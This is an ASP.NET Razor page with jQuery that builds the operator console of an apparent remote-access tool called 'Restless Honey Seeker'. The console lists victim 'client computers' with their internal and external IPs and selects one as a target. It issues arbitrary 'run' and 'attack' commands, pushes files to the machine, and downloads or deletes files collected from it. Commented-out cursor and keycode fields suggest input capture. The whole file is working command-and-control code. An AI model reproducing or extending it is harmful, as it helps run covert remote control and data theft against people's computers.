@{
    ViewBag.Title = "Restlesss Honey Seeker";
}
@Styles.Render("~/Content/jquery.console.blink.css")
@Styles.Render("~/Content/jquery.console.custom.css")
@Styles.Render("~/Content/main.css")
<div class="row">
    <div class="col-md-12">
        <form role="form" class="form-inline">
            <input id="files" type="file" />
        </form>
    </div>
</div>
<div class="row">
    <div class="col-md-12">
        <div class="console"></div>
    </div>
</div>
<div class="row">
    <div class="col-md-12">
        <span class="pull-left">Status: </span><span class="pull-left" id="status">&nbsp;</span>
    </div>
</div>
<script type="text/javascript" src="~/Content/jquery.console.js"></script>
<script type="text/javascript">
    var controller = null,
        currentTarget = null,
        returnResult = [],
        computers = [],
        files = [],
        serverCommands = [
        { 'name': 'help', 'desc': '' },
        { 'name': 'cmd', 'desc': 'List of client commands' },
        { 'name': 'clear', 'desc': 'Clear console' },
        { 'name': 'target', 'desc': 'List client computers' },
        { 'name': 'target {number}', 'desc': 'Set target (e.g. target 0)' },
        { 'name': 'target remove', 'desc': 'Remove current target' },
        { 'name': 'ls', 'desc': 'List files / results for current target' },
        { 'name': 'get {number}', 'desc': 'Download a file from the server (e.g. get 0)' },
        { 'name': 'rm {number}', 'desc': 'Remove a file from the server (e.g. get 0)' }
        ];

    $(function () {
        var console = $('.console');
        controller = console.console({
            promptLabel: '> ',
            commandValidate: function (line) {
                if (line == "") return false;
                else return true;
            },
            commandHandle: function (line, report) {
                var isDone = false;
                executeCommand(line, function (result) {
                    isDone = true;
                    report(result);
                });
                if (!isDone) {
                    report("");
                    return false;
                }
            },
            animateScroll: true,
            promptHistory: true,
            welcomeMessage: "Restless Honey Seeker [Version 2016.2.4]\r\nType 'help' for a list of commands"
        });
        //controller.promptText('');
        $('input[type="file"]').change(function () {
            commands['upload']("file", function (result) {
                //alert("done uploading!");
            });
        });
    });

    function executeCommand(input, onSuccess) {
        var inputSplit = input.split(' ');
        var command = inputSplit.length > 0 ? inputSplit[0] : null;
        var parameters = inputSplit.length > 1 ? inputSplit.slice(1, inputSplit.length) : null;
        if (command) {
            if (typeof commands[command] === 'function') {
                commands[command](parameters, onSuccess);
            }
            else {
                commands['run'](command, parameters, onSuccess);
            }
        }
    }

    function getResult() {
        var result = returnResult.slice(0);
        returnResult = [];
        return result;
    }

    function addLine(text, hasMargin, _className) {
        text += hasMargin ? "\t" : "";
        returnResult.push({ msg: text, className: "jquery-console-message-value" + (_className ? " " + _className : "") });
    }

    var commands = {
        upload: function (parameters, onSuccess) {
            var files = $("#files").get(0).files;
            console.log(files);
            if (currentTarget && currentTarget['IsOnline']) {
                if (files && files.length > 0) {
                    var fileName = files[0]['name'];
                    addLine("Uploading file '" + fileName + "'...");
                    var data = new FormData();
                    data.append("UploadedFile", files[0]);
                    $.ajax({
                        type: 'POST',
                        url: '/Home/UploadFile',
                        contentType: false,
                        processData: false,
                        data: data,
                        success: function (data) {
                            addLine("Done uploading file!");
                            controller.report(getResult());
                            editSettings('@Library.ECommand.UploadFile', fileName, "");
                        }
                    });
                }
            }
            else {
                noTarget();
                controller.report(getResult());
            }
        },
        help: function (parameters, onSuccess) {
            addLine("Available server commands:");
            $.each(serverCommands, function (k, v) {
                addLine(getCommandDescription(v), true);
            });
            onSuccess(getResult());
        },
        cmd: function (parameters, onSuccess) {
            addLine("Available client commands:");
            $.get('/Home/GetAvailableCommands').done(function (text) {
                var commands = JSON.stringify(text);
                $.each(JSON.parse(commands), function (k, v) {
                    addLine(v, true);
                });
                onSuccess(getResult());
            });
        },
        clear: function (parameters, onSuccess) {
            controller.reset();
            addLine("Type 'help' for a list of commands.", "white");
            onSuccess(getResult());
        },
        cls: function (parameters, onSuccess) {
            commands["clear"]();
        },
        get: function (parameters, onSuccess) {
            var file = getSelectedFile(parameters);
            if (currentTarget && file) {
                window.open('/Home/GetFile?computerHash=' + currentTarget['Hash'] + '&file=' + file);
            }
        },
        rm: function (parameters, onSuccess) {
            var file = getSelectedFile(parameters);
            if (currentTarget && file) {
                $.post('/Home/DeleteFile', { 'computerHash': currentTarget['Hash'], 'filename': file }, function (result) {
                    console.log("result: " + result);
                }, "json");
            }
        },
        ls: function (parameters, onSuccess) {
            if (currentTarget) {
                $.ajax({
                    url: '/Home/GetFilesInDir?computerHash=' + currentTarget['Hash'],
                    dataType: 'text',
                    success: function (data) {
                        var json = JSON.parse(data);
                        files = [];
                        $.each(json, function (k, v) {
                            files.push({ id: "" + k, val: v });
                            addLine(k + ": " + v);
                        });
                        //console.log(json);
                        onSuccess(getResult());
                    }
                });
            }
            else {
                noTarget();
                onSuccess(getResult());
            }
        },
        run: function (command, parameters, onSuccess) {
            if (currentTarget) {
                if (currentTarget['IsOnline']) {
                    addLine("Target: '" + getComputerDescription(currentTarget) + "'.");
                    addLine("Command: " + command);
                    var pars = "";
                    if (parameters && parameters.length >= 1) {
                        var parsArray = parameters;
                        for (var i = 0; i < parsArray.length; i++) {
                            pars += parsArray[i] + " ";
                        }
                        pars = pars.trim();
                    }
                    addLine("Parameters: " + pars);
                    editSettings(command, pars, "");
                    getStatus(onSuccess);
                }
                else {
                    targetIsOffline(currentTarget);
                }
            } else {
                noTarget();
            }
            onSuccess(getResult());
        },
        attack: function (parameters, onSuccess) {
            var command = parameters.length >= 1 ? parameters[0] : null;
            commands.run(command, parameters.slice(1, parameters.length), onSuccess);
        },
        target: function (parameters, onSuccess) {
            if (parameters) {
                if (parameters.length == 1) {
                    var param1 = ('' + parameters[0]).toLowerCase();
                    if (param1 == 'remove' || param1 == 'clear') {
                        addLine("Target '" + getComputerDescription(currentTarget) + "' removed.", true, (currentTarget['IsOnline'] ? "green" : "red"));
                        currentTarget = null;
                    }
                    else {
                        var obj = _.findWhere(computers, { 'id': param1 });
                        if (obj && obj['val']) {
                            if (obj['val']['IsOnline']) {
                                currentTarget = obj['val'];
                                addLine("New Target: " + getComputerDescription(currentTarget), true, (currentTarget['IsOnline'] ? "green" : "red"));
                            }
                            else {
                                targetIsOffline(obj['val']);
                            }
                        }
                    }
                    onSuccess(getResult());
                }
            }
            else {
                if (currentTarget) {
                    $.getJSON('/Home/GetComputers').done(function (data) {
                        var isOnline = currentTarget['IsOnline'];
                        loadComputers(data, function (k, v) {
                            if (v.Hash === currentTarget.Hash) {
                                currentTarget = v;
                                isOnline = currentTarget['IsOnline'];
                                return false;
                            }
                        });
                        addLine("Current Target: " + getComputerDescription(currentTarget), true, (currentTarget['IsOnline'] ? "green" : "red"));
                        onSuccess(getResult());
                    });
                }
                else {
                    $.getJSON('/Home/GetComputers').done(function (data) {
                        noTarget();
                        addLine("Available computers:");
                        loadComputers(data, function (k, v) {
                            addLine(k + ": " + getComputerDescription(v), true, (v['IsOnline'] ? "green" : "red"));
                        });
                        onSuccess(getResult());
                    });
                }
            }
        }
    }

    function loadComputers(data, onEach) {
        computers = [];
        $.each(JSON.parse(data), function (k, v) {
            computers.push({ id: "" + k, val: v });
            onEach(k, v);
        });
    }

    function getSelectedFile(parameters) {
        var file = files && parameters && parameters.length === 1 ? files[parameters] : null;
        return file ? file['val'] : null;
    }

    function noTarget() {
        addLine("No target selected!\r\nUse 'target' to see a list of client computers.");
    }

    function targetIsOffline(t) {
        addLine("Target '" + t['Name'] + "' is OFFLINE!", true, "red");
    }

    var psChecker;

    function getStatus(onSuccess) {
        addLine("waiting for response (data) from client...");
        onSuccess(getResult());
        psChecker = setInterval(function () {
            $.ajax({
                url: '/api/rhs/getsettings', // returns settings.json
                dataType: 'text',
                success: function (data) {
                    var json = JSON.parse(data);
                    if (currentTarget != null) {
                        if (json['ComputerHash'] == null) {
                            clearInterval(psChecker);
                            $("#status").text("Done!");
                            if (json['OutputFile']) {
                                if (json['CanDisplayFileContents']) {
                                    $.ajax({
                                        url: '/Home/GetFile?computerHash=' + currentTarget['Hash'] + '&file=' + json['OutputFile'],
                                        dataType: 'text',
                                        success: function (result) {
                                            addLine(result);
                                            onSuccess(getResult());
                                        }
                                    });
                                } else {
                                    addLine("Finished executing");
                                    onSuccess(getResult());
                                }
                            }
                            else {
                                addLine("Finished executing");
                                onSuccess(getResult());
                            }
                        }
                        else {
                            $("#status").text("Working...");
                        }
                    }
                }
            });
        }, 500);
    }

    function getCommandDescription(command) {
        return command['name'] + (command['desc'] ? " (" + command['desc'] + ")" : "");
    }

    function getComputerDescription(computer) {
        if (computer) {
            return computer['Name'] + ", " + (computer['IsOnline'] ? "ONLINE" : "OFFLINE") + ", Hash: " + computer['Hash'] + ", IP ext.: " + computer['IpExternal'] + ", IP int.: " + computer['IpInternal'];
        }
        return "No computer selected";
    }

    function editSettings(command, parameters, file) {
        if (currentTarget) {
            var data = {
                'ComputerHash': currentTarget['Hash'],
                'Command': command,
                'File': file,
                'Parameters': parameters,
                //'cursorX': cursorX,
                //'cursorY': cursorY,
                //'keyCode': keyCode
            };
            $.post('/api/RHS/SaveSettings', data, function (result) {
                //console.log("result: " + result);
            }, "json");
        }
    }
</script>
<noscript>
    <p>
        <strong>Please enable JavaScript or upgrade your browser.</strong>
    </p>
</noscript>